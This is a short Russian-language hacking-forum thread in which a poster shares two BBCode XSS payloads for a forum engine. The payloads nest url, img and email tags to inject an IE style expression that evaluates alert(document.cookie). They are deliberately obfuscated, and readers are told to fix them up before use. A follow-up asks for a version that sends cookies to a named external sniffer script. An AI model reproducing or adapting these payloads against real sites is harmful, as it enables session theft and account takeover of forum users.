Через 2 минуты я уже выделил две самых простых XSS. Их хватит. Если нет - берите ещё. Я сделаю видео.


[urл=http://a[еmail=s=`]a[/еmail]]a[/urл]`xss=`alert(document.cookie);this.xss=null`
style=top:expression(eval(this.xss));

[iмg]http://[urл=http://s=`]aaaaa[/urл][/iмg]`xss=`alert(document.cookie);this.xss=null`
style=top:expression(eval(this.xss));


ВНИМАНИЕ! Чтобы НАШ ФОРУМ не парсил (не зависимо от тега [СODE]) мой код, я НАМЕРЕННО написал URL через Л. И емейл тоже так написал.
ПЕРЕПИШИТЕ САМИ!

наверное все можно сделать проще

это самое просто... просто тег+тег и s=`

конечно с `xss=... а потом eval(this.xss) и все такое - это я так привык.
можно и проще

А не мог бы написать пример используя античатовский сниффер http://antichat.ru/cgi-bin/s.jpg

Мог бы, но сейчас я вижу что куки там украсть нельзя... Если получится сделаю видео...